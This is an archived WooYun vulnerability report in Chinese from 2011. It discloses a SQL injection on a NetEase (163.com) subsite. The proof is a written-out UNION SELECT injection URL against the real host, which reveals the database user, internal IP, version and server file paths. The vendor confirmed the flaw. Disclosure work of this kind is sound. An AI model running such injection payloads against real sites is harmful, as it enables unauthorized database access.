漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-01915
漏洞标题:163-双喜分站注入漏洞
相关厂商:网易
漏洞作者: Jesus
提交时间:2011-04-17 06:36
修复时间:2011-05-17 09:00
公开时间:2011-05-17 09:00
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-04-17: 细节已通知厂商并且等待厂商处理中
2011-04-18: 厂商已经确认,细节仅向厂商公开
2011-04-28: 细节向核心白帽子及相关领域专家公开
2011-05-08: 细节向普通白帽子公开
2011-05-18: 细节向实习白帽子公开
2011-05-17: 细节向公众公开
简要描述:
在一个夜黑风不高的白天,还在看着教育片
突然弹出个URL
详细说明:
http://shuangxi.163.com/story.php?id=7%20and%201=2%20union%20select%201,user(),@@version,4,database(),6,7
minisite@10.100.50.22
database:sales
version:4.0.26-log
/home2/www/minisite/2010/0813/shuangxi/include/test.inc.php
/home/www/minisite/include/uploadpic_new.inc.php
漏洞证明:
http://shuangxi.163.com/story.php?id=7%20and%201=2%20union%20select%201,user(),@@version,4,database(),6,7
修复方案:
过滤些URL,严格审核post、get、cookie里面的内容
PS:其实我刚写了一大堆东西,居然和我说验证码错了!简而精之吧
网易的兄弟,还望多给点rank哈!
如果多给点rank,可以考虑多发几个你们的sql injection,嘎嘎
版权声明:转载请注明来源 Jesus@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:2
确认时间:2011-04-18 11:30
厂商回复:
添加对漏洞的补充说明以及做出评价的理由
最新状态:
暂无